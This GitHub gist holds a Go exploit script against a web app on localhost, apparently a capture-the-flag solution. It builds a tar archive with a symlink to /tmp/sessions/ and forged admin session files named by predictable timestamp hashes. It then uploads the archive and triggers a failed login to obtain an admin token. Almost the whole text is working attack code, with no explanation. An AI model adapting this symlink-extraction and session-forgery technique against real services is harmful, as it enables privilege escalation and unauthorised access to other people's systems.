Created
January 16, 2026 11:35
-
-
Save zahmadsaleem/99681149a147813870fff7e76ea7149d to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "archive/tar" | |
| "crypto/sha256" | |
| "errors" | |
| "fmt" | |
| "net/http" | |
| "os" | |
| "strconv" | |
| "time" | |
| "resty.dev/v3" | |
| ) | |
| const target = "http://localhost:1337" | |
| func sessionId(ts int64) string { | |
| return fmt.Sprintf("%x", sha256.Sum256([]byte(strconv.FormatInt(ts, 10)))) | |
| } | |
| func createPayloadZip() error { | |
| tarFile, err := os.Create("payload.tar") | |
| if err != nil { | |
| return err | |
| } | |
| defer tarFile.Close() | |
| tarWriter := tar.NewWriter(tarFile) | |
| defer tarWriter.Close() | |
| now := time.Now().Unix() + 1 | |
| nowName := strconv.Itoa(int(now)) | |
| symlinkHeader := &tar.Header{ | |
| Name: nowName, | |
| Linkname: "/tmp/sessions/", | |
| Typeflag: tar.TypeSymlink, | |
| Mode: 0777, | |
| } | |
| err = tarWriter.WriteHeader(symlinkHeader) | |
| if err != nil { | |
| return err | |
| } | |
| // create session payload for next 5 seconds | |
| for i := 0; i < 5; i++ { | |
| next := now + int64(i) | |
| sessionHash := sessionId(next) | |
| fmt.Println("creating session for ", next, " with hash ", sessionHash, "") | |
| payload := `{ | |
| "role":"admin", | |
| "username":"abcd", | |
| "id":3 | |
| }` | |
| fileHeader := &tar.Header{ | |
| Name: nowName + "/abcd/" + sessionHash, | |
| Mode: 0644, | |
| Size: int64(len(payload)), | |
| Typeflag: tar.TypeReg, | |
| } | |
| err = tarWriter.WriteHeader(fileHeader) | |
| if err != nil { | |
| return err | |
| } | |
| _, err = tarWriter.Write([]byte(payload)) | |
| if err != nil { | |
| return err | |
| } | |
| } | |
| return nil | |
| } | |
| func login(username, password string) (string, error) { | |
| fmt.Println("Logging in as ", username, "expected session id:", sessionId(time.Now().Unix())) | |
| // json submission using resty/v3 | |
| client := resty.New() | |
| client.SetRedirectPolicy(resty.NoRedirectPolicy()) | |
| resp, err := client.R(). | |
| SetHeader("Content-Type", "application/json"). | |
| SetBody(map[string]string{ | |
| "username": username, | |
| "password": password, | |
| }). | |
| Post(target + "/login") | |
| if err != nil { | |
| panic(err) | |
| } | |
| fmt.Println("Response Status:", resp.Status()) | |
| fmt.Println("Response Body:", resp.String()) | |
| if resp.StatusCode() >= 400 { | |
| return "", errors.New("login: " + resp.String()) | |
| } | |
| var session string | |
| for _, cookie := range resp.Cookies() { | |
| if cookie.Name == "session" { | |
| session = cookie.Value | |
| break | |
| } | |
| } | |
| fmt.Println("Got session cookie: ", session) | |
| return session, nil | |
| } | |
| func upload(username, session string) { | |
| client := resty.New() | |
| file, err := os.Open("payload.tar") | |
| if err != nil { | |
| panic(err) | |
| } | |
| defer file.Close() | |
| resp, err := client.R(). | |
| SetFileReader("archive", "payload.tar", file). | |
| SetCookie(&http.Cookie{ | |
| Name: "username", | |
| Value: username, | |
| }). | |
| SetCookie(&http.Cookie{ | |
| Name: "session", | |
| Value: session, | |
| }). | |
| Post(target + "/user/upload") | |
| if err != nil { | |
| panic(err) | |
| } | |
| fmt.Println("Response Status:", resp.Status()) | |
| fmt.Println("Response Body:", resp.String()) | |
| if resp.StatusCode() >= 400 { | |
| panic("failed to upload") | |
| } | |
| } | |
| func admin(username string) { | |
| fmt.Println("Getting admin token for ", username, "expected session at server", sessionId(time.Now().Unix())) | |
| client := resty.New() | |
| resp, err := client.R(). | |
| SetCookie(&http.Cookie{ | |
| Name: "session", | |
| Value: "rubbish", | |
| }). | |
| SetCookie(&http.Cookie{ | |
| Name: "username", | |
| Value: username, | |
| }). | |
| Get(target + "/user/admin") | |
| if err != nil { | |
| panic(err) | |
| } | |
| fmt.Println("Response Status:", resp.Status()) | |
| fmt.Println("Response Body:", resp.String()) | |
| if resp.StatusCode() != 200 { | |
| panic("failed to get admin token") | |
| } | |
| } | |
| func main() { | |
| // signed up manually | |
| username := "abcd" | |
| password := "1234" | |
| session, err := login(username, password) | |
| if err != nil { | |
| panic(err) | |
| } | |
| // upload tar | |
| err = createPayloadZip() | |
| if err != nil { | |
| panic(err) | |
| } | |
| upload(username, session) | |
| // fake login with bad password | |
| time.Sleep(2 * time.Second) | |
| _, _ = login(username, "wrongpassword") | |
| // get admin token | |
| admin(username) | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment